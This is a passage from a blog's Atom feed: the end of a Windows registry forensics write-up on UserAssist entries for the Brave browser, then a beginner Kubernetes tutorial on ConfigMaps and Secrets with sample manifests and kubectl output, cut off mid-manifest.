class=&#34;line&#34;&gt;* 0xa80333cda000        \??\C:\Users\John Doe\ntuser.dat        ntuser.dat\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\&amp;#123;CEBFF5CD-ACE2-4F4F-9178-9926F41749EA&amp;#125;\Count  2021-04-30 17:52:18      Value   Brave   N/A     9       22      4:01:54  2021-04-30 17:48:45&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;* 0xa80333cda000        \??\C:\Users\John Doe\ntuser.dat        ntuser.dat\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\&amp;#123;F4E57C4B-2036-45F0-A9AB-443BCFE33D9F&amp;#125;\Count  2021-04-30 17:51:18      Value   C:\Users\Public\Desktop\Brave.lnk       N/A     8       0     0:00:00.508000   2021-04-30 17:48:45&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/figure&gt;
&lt;div class=&#34;note success&#34;&gt;
&lt;p&gt;Answer:  04:01:54&lt;/p&gt;
&lt;/div&gt;
</content>
        <updated>2022-09-06T10:29:37.000Z</updated>
    </entry>
    <entry>
        <id>http://example.com/2022/09/06/Kubernetes/configmap-secrets/</id>
        <title>Introduction To Configmap &amp; Secrets</title>
        <link rel="alternate" href="http://example.com/2022/09/06/Kubernetes/configmap-secrets/"/>
        <content type="html">&lt;h2 id=&#34;an-introduction-to-kubernetes-secrets-and-configmaps&#34;&gt;&lt;a class=&#34;markdownIt-Anchor&#34; href=&#34;#an-introduction-to-kubernetes-secrets-and-configmaps&#34;&gt;#&lt;/a&gt; An introduction to Kubernetes Secrets and ConfigMaps&lt;/h2&gt;
&lt;p&gt;Kubernetes has two types of objects that can inject configuration data into a container when it starts up: Secrets and ConfigMaps. Secrets and ConfigMaps behave similarly in Kubernetes, both in how they are created and because they can be exposed inside a container as mounted files or volumes or environment variables.&lt;/p&gt;
&lt;h3 id=&#34;to-understand-more-how-configmap-and-secrets-are-important-lets-consider-the-following-scenario&#34;&gt;&lt;a class=&#34;markdownIt-Anchor&#34; href=&#34;#to-understand-more-how-configmap-and-secrets-are-important-lets-consider-the-following-scenario&#34;&gt;#&lt;/a&gt; To understand more how configmap and secrets are important let’s consider the following scenario:&lt;/h3&gt;
&lt;p&gt;You have to run a postgres docker image on your host, you explore the documentation of this docker image provided in &lt;em&gt;&lt;a href=&#34;%22https://hub.docker.com/_/postgres%22&#34;&gt;DockerHub&lt;/a&gt;&lt;/em&gt; and you find that you the PostgreSQL image uses several environment variables and there is a mandatory variable called  &lt;code&gt;POSTGRES_PASSWORD&lt;/code&gt;  must be defined by running this following command:&lt;/p&gt;
&lt;figure class=&#34;highlight bash&#34;&gt;&lt;table&gt;&lt;tr&gt;&lt;td class=&#34;gutter&#34;&gt;&lt;pre&gt;&lt;span class=&#34;line&#34;&gt;1&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;td class=&#34;code&#34;&gt;&lt;pre&gt;&lt;span class=&#34;line&#34;&gt;$  docker run --name my-postgres -e POSTGRES_PASSWORD=mypassword -d postgres&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/figure&gt;
&lt;h3 id=&#34;but-how-we-can-use-this-environment-variables-and-how-we-can-manage-them-in-kubernetes&#34;&gt;&lt;a class=&#34;markdownIt-Anchor&#34; href=&#34;#but-how-we-can-use-this-environment-variables-and-how-we-can-manage-them-in-kubernetes&#34;&gt;#&lt;/a&gt; But how we can use this environment variables and how we can manage them in kubernetes ?&lt;/h3&gt;
&lt;p&gt;We can centralize the variables environment in two types of objects and import these variables in the manifest of a pod, replicasets, or deployments&lt;/p&gt;
&lt;h3 id=&#34;what-is-a-configmaps&#34;&gt;&lt;a class=&#34;markdownIt-Anchor&#34; href=&#34;#what-is-a-configmaps&#34;&gt;#&lt;/a&gt; What is a ConfigMaps&lt;/h3&gt;
&lt;p&gt;In Kubernetes, a ConfigMap is nothing more than a key/value pair. A ConfigMap store’s non-confidential data, meaning no passwords or API keys. Pods can consume ConfigMaps as environment variables, command-line arguments, or as configuration files in a volume.&lt;/p&gt;
&lt;p&gt;A ConfigMap allows you to decouple environment-specific configuration from your container images, so that your applications are easily portable.&lt;/p&gt;
&lt;h4 id=&#34;example-of-confimap-manifest-that-store-the-database-name-username&#34;&gt;&lt;a class=&#34;markdownIt-Anchor&#34; href=&#34;#example-of-confimap-manifest-that-store-the-database-name-username&#34;&gt;#&lt;/a&gt; Example of confimap manifest that store the database name &amp;amp; username:&lt;/h4&gt;
&lt;figure class=&#34;highlight yaml&#34;&gt;&lt;table&gt;&lt;tr&gt;&lt;td class=&#34;gutter&#34;&gt;&lt;pre&gt;&lt;span class=&#34;line&#34;&gt;1&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;2&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;3&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;4&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;5&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;6&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;7&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;td class=&#34;code&#34;&gt;&lt;pre&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;attr&#34;&gt;apiVersion:&lt;/span&gt; &lt;span class=&#34;string&#34;&gt;v1&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;attr&#34;&gt;kind:&lt;/span&gt; &lt;span class=&#34;string&#34;&gt;ConfigMap&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;attr&#34;&gt;metadata:&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;  &lt;span class=&#34;attr&#34;&gt;name:&lt;/span&gt; &lt;span class=&#34;string&#34;&gt;config-map&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;attr&#34;&gt;data:&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;  &lt;span class=&#34;attr&#34;&gt;postgres-db:&lt;/span&gt; &lt;span class=&#34;string&#34;&gt;&amp;quot;database&amp;quot;&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;  &lt;span class=&#34;attr&#34;&gt;postgres-user:&lt;/span&gt; &lt;span class=&#34;string&#34;&gt;&amp;quot;mohamed&amp;quot;&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/figure&gt;
&lt;h4 id=&#34;create-the-configmaps-object&#34;&gt;&lt;a class=&#34;markdownIt-Anchor&#34; href=&#34;#create-the-configmaps-object&#34;&gt;#&lt;/a&gt; Create the ConfigMaps Object:&lt;/h4&gt;
&lt;figure class=&#34;highlight bash&#34;&gt;&lt;table&gt;&lt;tr&gt;&lt;td class=&#34;gutter&#34;&gt;&lt;pre&gt;&lt;span class=&#34;line&#34;&gt;1&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;2&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;td class=&#34;code&#34;&gt;&lt;pre&gt;&lt;span class=&#34;line&#34;&gt;justk8s@justk8s-master:~$ kubectl apply -f first-configmap.yaml&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;configmap/config-map created&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/figure&gt;
&lt;h4 id=&#34;list-the-configmap-objects&#34;&gt;&lt;a class=&#34;markdownIt-Anchor&#34; href=&#34;#list-the-configmap-objects&#34;&gt;#&lt;/a&gt; List the ConfigMap Objects:&lt;/h4&gt;
&lt;figure class=&#34;highlight bash&#34;&gt;&lt;table&gt;&lt;tr&gt;&lt;td class=&#34;gutter&#34;&gt;&lt;pre&gt;&lt;span class=&#34;line&#34;&gt;1&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;2&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;3&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;4&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;td class=&#34;code&#34;&gt;&lt;pre&gt;&lt;span class=&#34;line&#34;&gt;justk8s@justk8s-master:~$ kubectl get configmap&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;NAME               DATA   AGE&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;config-map         2      26s&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;kube-root-ca.crt   1      13h&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/figure&gt;
&lt;h3 id=&#34;what-is-a-secrets&#34;&gt;&lt;a class=&#34;markdownIt-Anchor&#34; href=&#34;#what-is-a-secrets&#34;&gt;#&lt;/a&gt; What is a Secrets:&lt;/h3&gt;
&lt;p&gt;Secrets are a Kubernetes object intended for storing a small amount of sensitive data. It is worth noting that Secrets are stored base64-encoded within Kubernetes, so they are not wildly secure.&lt;br&gt;
Secrets are similar to ConfigMaps but are specifically intended to hold confidential data.&lt;/p&gt;
&lt;h4 id=&#34;example-of-confimap-manifest-that-store-the-database-password&#34;&gt;&lt;a class=&#34;markdownIt-Anchor&#34; href=&#34;#example-of-confimap-manifest-that-store-the-database-password&#34;&gt;#&lt;/a&gt; Example of confimap manifest that store the database password:&lt;/h4&gt;
&lt;p&gt;we must encode the value that we will stored in the Secrets&lt;/p&gt;
&lt;figure class=&#34;highlight bash&#34;&gt;&lt;table&gt;&lt;tr&gt;&lt;td class=&#34;gutter&#34;&gt;&lt;pre&gt;&lt;span class=&#34;line&#34;&gt;1&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;2&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;td class=&#34;code&#34;&gt;&lt;pre&gt;&lt;span class=&#34;line&#34;&gt;justk8s@justk8s-master:~$ &lt;span class=&#34;built_in&#34;&gt;echo&lt;/span&gt; -n &lt;span class=&#34;string&#34;&gt;&amp;quot;mohamed&amp;quot;&lt;/span&gt; | &lt;span class=&#34;built_in&#34;&gt;base64&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;bW9oYW1lZA==&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/figure&gt;
&lt;p&gt;Now we can use the base64 cipher in the Secret manifest&lt;/p&gt;
&lt;figure class=&#34;highlight yaml&#34;&gt;&lt;table&gt;&lt;tr&gt;&lt;td class=&#34;gutter&#34;&gt;&lt;pre&gt;&lt;span class=&#34;line&#34;&gt;1&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;2&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;3&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;4&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;5&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;6&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;7&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;td class=&#34;code&#34;&gt;&lt;pre&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;attr&#34;&gt;apiVersion:&lt;/span&gt; &lt;span class=&#34;string&#34;&gt;v1&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;attr&#34;&gt;kind:&lt;/span&gt; &lt;span class=&#34;string&#34;&gt;Secret&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;attr&#34;&gt;metadata:&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;  &lt;span class=&#34;attr&#34;&gt;name:&lt;/span&gt; &lt;span class=&#34;string&#34;&gt;database-secret&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;attr&#34;&gt;type:&lt;/span&gt; &lt;span class=&#34;string&#34;&gt;Opaque&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;attr&#34;&gt;data:&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;  &lt;span class=&#34;attr&#34;&gt;postgres-pass:&lt;/span&gt; &lt;span class=&#34;string&#34;&gt;&amp;quot;bW9oYW1lZA==&amp;quot;&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/figure&gt;
&lt;h4 id=&#34;create-the-configmaps-object-2&#34;&gt;&lt;a class=&#34;markdownIt-Anchor&#34; href=&#34;#create-the-configmaps-object-2&#34;&gt;#&lt;/a&gt; Create the ConfigMaps Object:&lt;/h4&gt;
&lt;figure class=&#34;highlight bash&#34;&gt;&lt;table&gt;&lt;tr&gt;&lt;td class=&#34;gutter&#34;&gt;&lt;pre&gt;&lt;span class=&#34;line&#34;&gt;1&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;2&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;td class=&#34;code&#34;&gt;&lt;pre&gt;&lt;span class=&#34;line&#34;&gt;justk8s@justk8s-master:~$ kubectl apply -f first-secret.yaml&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;secret/database-secret created&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/figure&gt;
&lt;h4 id=&#34;list-the-configmap-objects-2&#34;&gt;&lt;a class=&#34;markdownIt-Anchor&#34; href=&#34;#list-the-configmap-objects-2&#34;&gt;#&lt;/a&gt; List the ConfigMap Objects:&lt;/h4&gt;
&lt;figure class=&#34;highlight bash&#34;&gt;&lt;table&gt;&lt;tr&gt;&lt;td class=&#34;gutter&#34;&gt;&lt;pre&gt;&lt;span class=&#34;line&#34;&gt;1&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;2&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;3&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;4&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;td class=&#34;code&#34;&gt;&lt;pre&gt;&lt;span class=&#34;line&#34;&gt;justk8s@justk8s-master:~$ kubectl get secrets&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;NAME                  TYPE                                  DATA   AGE&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;database-secret       Opaque                                1      8s&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;default-token-xl8sl   kubernetes.io/service-account-token   3      13h&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/figure&gt;
&lt;h3 id=&#34;how-to-use-configmaps-and-secrets-values-in-a-pod&#34;&gt;&lt;a class=&#34;markdownIt-Anchor&#34; href=&#34;#how-to-use-configmaps-and-secrets-values-in-a-pod&#34;&gt;#&lt;/a&gt; How to use ConfigMaps and Secrets values in a Pod&lt;/h3&gt;
&lt;p&gt;we can use the values from  &lt;code&gt;ConfigMaps&lt;/code&gt;  and  &lt;code&gt;Secrets&lt;/code&gt;  in the pod manifests in the  &lt;code&gt;env&lt;/code&gt;  propriety of the container by using the  &lt;code&gt;valueFrom&lt;/code&gt;  field that can import values from configMap and Secrets&lt;/p&gt;
&lt;figure class=&#34;highlight yaml&#34;&gt;&lt;table&gt;&lt;tr&gt;&lt;td class=&#34;gutter&#34;&gt;&lt;pre&gt;&lt;span class=&#34;line&#34;&gt;1&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;2&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;3&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;4&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;5&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;6&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;7&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;8&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;9&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;10&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;11&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;12&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;13&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;14&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;15&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;16&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;17&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;18&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;19&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;20&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;td class=&#34;code&#34;&gt;&lt;pre&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;attr&#34;&gt;apiVersion:&lt;/span&gt; &lt;span class=&#34;string&#34;&gt;v1&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;attr&#34;&gt;kind:&lt;/span&gt; &lt;span class=&#34;string&#34;&gt;Pod&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;attr&#34;&gt;metadata:&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;  &lt;span class=&#34;attr&#34;&gt;name:&lt;/span&gt; &lt;span class=&#34;string&#34;&gt;&amp;lt;pod-name&amp;gt;&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;attr&#34;&gt;spec:&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;  &lt;span class=&#34;attr&#34;&gt;containers:&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;    &lt;span class=&#34;bullet&#34;&gt;-&lt;/span&gt; &lt;span class=&#34;attr&#34;&gt;name:&lt;/span&gt; &lt;span class=&#34;string&#34;&gt;&amp;lt;name&amp;gt;&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;      &lt;span class=&#34;attr&#34;&gt;image:&lt;/span&gt; &lt;span class=&#34;string&#34;&gt;&amp;lt;image&amp;gt;&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;      &lt;span class=&#34;attr&#34;&gt;env:&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;        &lt;span class=&#34;comment&#34;&gt;# Define the environment variable&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;        &lt;span class=&#34;bullet&#34;&gt;-&lt;/span&gt; &lt;span class=&#34;attr&#34;&gt;name:&lt;/span&gt; &lt;span class=&#34;string&#34;&gt;&amp;lt;variable-name&amp;gt;&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;          &lt;span class=&#34;attr&#34;&gt;valueFrom:&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;            &lt;span class=&#34;attr&#34;&gt;configMapKeyRef:&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;              &lt;span class=&#34;attr&#34;&gt;name:&lt;/span&gt; &lt;span class=&#34;string&#34;&gt;&amp;lt;config-map-object&amp;gt;&lt;/span&gt;     &lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;              &lt;span class=&#34;attr&#34;&gt;key:&lt;/span&gt; &lt;span class=&#34;string&#34;&gt;&amp;lt;key-name&amp;gt;&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;        &lt;span class=&#34;bullet&#34;&gt;-&lt;/span&gt; &lt;span class=&#34;attr&#34;&gt;name:&lt;/span&gt; &lt;span class=&#34;string&#34;&gt;&amp;lt;variable-name&amp;gt;&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;          &lt;span class=&#34;attr&#34;&gt;valueFrom:&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;            &lt;span class=&#34;attr&#34;&gt;secretKeyRef:&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;              &lt;span class=&#34;attr&#34;&gt;name:&lt;/span&gt; &lt;span class=&#34;string&#34;&gt;&amp;lt;secret-object&amp;gt;&lt;/span&gt;     &lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;              &lt;span class=&#34;attr&#34;&gt;key:&lt;/span&gt; &lt;span class=&#34;string&#34;&gt;&amp;lt;key-name&amp;gt;&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/figure&gt;
&lt;h3 id=&#34;create-a-postgresql-pod-that-uses-values-from-configmaps-and-secrets&#34;&gt;&lt;a class=&#34;markdownIt-Anchor&#34; href=&#34;#create-a-postgresql-pod-that-uses-values-from-configmaps-and-secrets&#34;&gt;#&lt;/a&gt; Create a PostgreSQL Pod that uses values from ConfigMaps and Secrets&lt;/h3&gt;
&lt;h4 id=&#34;1-create-the-pod-manifest&#34;&gt;&lt;a class=&#34;markdownIt-Anchor&#34; href=&#34;#1-create-the-pod-manifest&#34;&gt;#&lt;/a&gt; 1- Create the Pod manifest:&lt;/h4&gt;
&lt;figure class=&#34;highlight yaml&#34;&gt;&lt;table&gt;&lt;tr&gt;&lt;td class=&#34;gutter&#34;&gt;&lt;pre&gt;&lt;span class=&#34;line&#34;&gt;1&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;2&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;3&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;4&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;5&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;6&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;7&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;8&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;9&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;10&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;11&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;12&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;13&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;14&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;15&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;16&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;17&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;18&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;19&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;20&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;21&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;22&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;23&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;24&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;25&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;26&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;27&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;28&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;29&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;td class=&#34;code&#34;&gt;&lt;pre&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;attr&#34;&gt;apiVersion:&lt;/span&gt; &lt;span class=&#34;string&#34;&gt;v1&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;attr&#34;&gt;kind:&lt;/span&gt; &lt;span class=&#34;string&#34;&gt;Pod&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;attr&#34;&gt;metadata:&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;  &lt;span class=&#34;attr&#34;&gt;name:&lt;/span&gt; &lt;span class=&#34;string&#34;&gt;postgresql&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;attr&#34;&gt;spec:&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;  &lt;span class=&#34;attr&#34;&gt;containers:&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;    &lt;span class=&#34;bullet&#34;&gt;-&lt;/span&gt; &lt;span class=&#34;attr&#34;&gt;name:&lt;/span&gt; &lt;span class=&#34;string&#34;&gt;postgres&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;      &lt;span class=&#34;attr&#34;&gt;image:&lt;/span&gt; &lt;span class=&#34;string&#34;&gt;postgres&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;      &lt;span class=&#34;attr&#34;&gt;ports:&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;        &lt;span class=&#34;bullet&#34;&gt;-&lt;/span&gt; &lt;span class=&#34;attr&#34;&gt;containerPort:&lt;/span&gt; &lt;span class=&#34;number&#34;&gt;5432&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;      &lt;span class=&#34;attr&#34;&gt;env:&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;        &lt;span class=&#34;comment&#34;&gt;# Define the environment variable&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;        &lt;span class=&#34;bullet&#34;&gt;-&lt;/span&gt; &lt;span class=&#34;attr&#34;&gt;name:&lt;/span&gt; &lt;span class=&#34;string&#34;&gt;POSTGRES_USER&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;          &lt;span class=&#34;attr&#34;&gt;valueFrom:&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;            &lt;span class=&#34;attr&#34;&gt;configMapKeyRef:&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;              &lt;span class=&#34;attr&#34;&gt;name:&lt;/span&gt; &lt;span class=&#34;string&#34;&gt;config-map&lt;/span&gt;   &lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;              &lt;span class=&#34;attr&#34;&gt;key:&lt;/span&gt; &lt;span class=&#34;string&#34;&gt;postgres-user&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;        &lt;span class=&#34;bullet&#34;&gt;-&lt;/span&gt; &lt;span class=&#34;attr&#34;&gt;name:&lt;/span&gt; &lt;span class=&#34;string&#34;&gt;POSTGRES_DBNAME&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;          &lt;span class=&#34;attr&#34;&gt;valueFrom:&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;            &lt;span class=&#34;attr&#34;&gt;configMapKeyRef:&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;              